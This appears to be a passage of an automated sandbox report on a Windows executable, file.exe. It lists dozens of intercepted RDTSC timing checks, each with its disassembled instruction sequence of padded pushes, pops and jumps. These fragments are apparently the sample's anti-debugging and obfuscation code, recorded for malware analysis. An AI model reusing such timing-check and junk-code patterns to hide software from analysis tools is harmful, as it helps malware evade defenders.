                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD08B0 second address: AD08B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7272 second address: AD729A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F1B751F19DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD729A second address: AD729E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD729E second address: AD72A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD72A4 second address: AD72B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1B74BBC1D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7401 second address: AD7409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF78C second address: ADF799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F1B74BBC1CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF799 second address: ADF7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19E8h 0x00000009 jmp 00007F1B751F19E0h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 jmp 00007F1B751F19E1h 0x00000016 jnl 00007F1B751F19D6h 0x0000001c pop eax 0x0000001d pushad 0x0000001e jo 00007F1B751F19D6h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 pushad 0x00000028 jo 00007F1B751F19D6h 0x0000002e push edi 0x0000002f pop edi 0x00000030 push edi 0x00000031 pop edi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE15F second address: AFE163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE163 second address: AFE16B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDC94 second address: AFDCA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDCA3 second address: AFDCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDCA9 second address: AFDCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDCB1 second address: AFDD01 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1B751F19D6h 0x00000008 jbe 00007F1B751F19D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jp 00007F1B751F19E9h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jl 00007F1B751F19DAh 0x0000001f pushad 0x00000020 jmp 00007F1B751F19E7h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17C6D second address: B17C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1B74BBC1CBh 0x00000008 jmp 00007F1B74BBC1D3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16B6B second address: B16B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19DEh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jnc 00007F1B751F19DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16CF9 second address: B16D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1B74BBC1C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16D03 second address: B16D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16F84 second address: B16F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16F88 second address: B16F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17115 second address: B17130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17130 second address: B17136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17136 second address: B1713C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1713C second address: B17140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B176B9 second address: B176CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F1B74BBC1C8h 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B176CB second address: B176DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F1B751F19D6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17856 second address: B1787E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F1B74BBC1D5h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BDD6 second address: B1BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BDDA second address: B1BE3A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F1B74BBC1C8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000004h 0x00000024 jmp 00007F1B74BBC1CDh 0x00000029 call 00007F1B74BBC1C9h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F1B74BBC1D9h 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BE3A second address: B1BE59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F1B751F19E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BE59 second address: B1BE5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BE5D second address: B1BE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c jo 00007F1B751F19D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BE71 second address: B1BE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1B74BBC1CAh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F54A second address: B1F568 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1B751F19D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push ecx 0x00000012 jnp 00007F1B751F19D6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F568 second address: B1F56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070CBC second address: 5070CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070CC2 second address: 5070CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1CBh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070CD1 second address: 5070D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1B751F19DDh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070D00 second address: 5070D67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov dh, DFh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e mov dx, ax 0x00000011 pop eax 0x00000012 mov ax, bx 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F1B74BBC1D5h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ebx, 52FA796Eh 0x00000026 pushfd 0x00000027 jmp 00007F1B74BBC1CFh 0x0000002c or esi, 002E1A1Eh 0x00000032 jmp 00007F1B74BBC1D9h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070D67 second address: 5070DAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F1B751F19E3h 0x0000000c sub cx, 442Eh 0x00000011 jmp 00007F1B751F19E9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070DAA second address: 5070DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070DAE second address: 5070DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060C5A second address: 5060C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060C60 second address: 5060CD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F1B751F19E4h 0x00000012 pushfd 0x00000013 jmp 00007F1B751F19E2h 0x00000018 add al, 00000008h 0x0000001b jmp 00007F1B751F19DBh 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F1B751F19E9h 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edx, ax 0x0000002f mov cx, F57Bh 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060CD0 second address: 5060D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0DF70F62h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 pushfd 0x00000011 jmp 00007F1B74BBC1CEh 0x00000016 and eax, 20D059F8h 0x0000001c jmp 00007F1B74BBC1CBh 0x00000021 popfd 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edi, 58EC4FE6h 0x0000002c pushfd 0x0000002d jmp 00007F1B74BBC1D7h 0x00000032 and ax, CA6Eh 0x00000037 jmp 00007F1B74BBC1D9h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0772 second address: 50A0776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0776 second address: 50A077A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50400B3 second address: 5040154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1B751F19DCh 0x00000011 or cx, A998h 0x00000016 jmp 00007F1B751F19DBh 0x0000001b popfd 0x0000001c mov si, 534Fh 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007F1B751F19E5h 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F1B751F19DEh 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F1B751F19DEh 0x00000036 or cx, AE58h 0x0000003b jmp 00007F1B751F19DBh 0x00000040 popfd 0x00000041 movzx ecx, di 0x00000044 popad 0x00000045 push dword ptr [ebp+04h] 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F1B751F19DEh 0x0000004f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060536 second address: 506053C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506053C second address: 506059E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1B751F19E0h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ch, dl 0x00000013 pushfd 0x00000014 jmp 00007F1B751F19DAh 0x00000019 add si, BD98h 0x0000001e jmp 00007F1B751F19DBh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F1B751F19E5h 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506059E second address: 50605A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50605A4 second address: 50605A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50605A8 second address: 50605C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1B74BBC1D2h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50605C6 second address: 50605ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1B751F19E5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060482 second address: 50604AA instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esi 0x00000009 pushad 0x0000000a call 00007F1B74BBC1CEh 0x0000000f mov edi, eax 0x00000011 pop ecx 0x00000012 mov si, dx 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604AA second address: 50604AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604AE second address: 50604B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604B2 second address: 50604B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604B8 second address: 50604D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1D8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604D4 second address: 50604D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604D8 second address: 5060500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F1B74BBC1D7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060500 second address: 5060504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060504 second address: 5060508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060508 second address: 506050E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506021D second address: 5060222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060222 second address: 5060230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B751F19DAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060230 second address: 506025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop edx 0x00000013 mov ch, 63h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1B74BBC1CBh 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506025B second address: 50602F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1B751F19DCh 0x00000011 jmp 00007F1B751F19E5h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007F1B751F19E0h 0x0000001d adc cl, 00000008h 0x00000020 jmp 00007F1B751F19DBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007F1B751F19E6h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F1B751F19E7h 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50602F0 second address: 50602F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50700EB second address: 50700FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50700FA second address: 5070100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070100 second address: 507011A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov bl, al 0x0000000c mov dx, 865Ah 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507011A second address: 5070134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A06A8 second address: 50A06AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A06AC second address: 50A06B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A06B2 second address: 50A06D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 96h 0x00000005 jmp 00007F1B751F19E7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A06D8 second address: 50A06DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A06DE second address: 50A06E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A06E4 second address: 50A06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1B74BBC1CDh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A06FE second address: 50A0704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0704 second address: 50A070C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080142 second address: 5080187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F1B751F19E7h 0x00000010 mov ebx, esi 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1B751F19E1h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080187 second address: 50801A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1B74BBC1D7h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50801A4 second address: 50801D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007F1B751F19E5h 0x0000000e mov eax, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1B751F19DDh 0x00000018 rdtsc
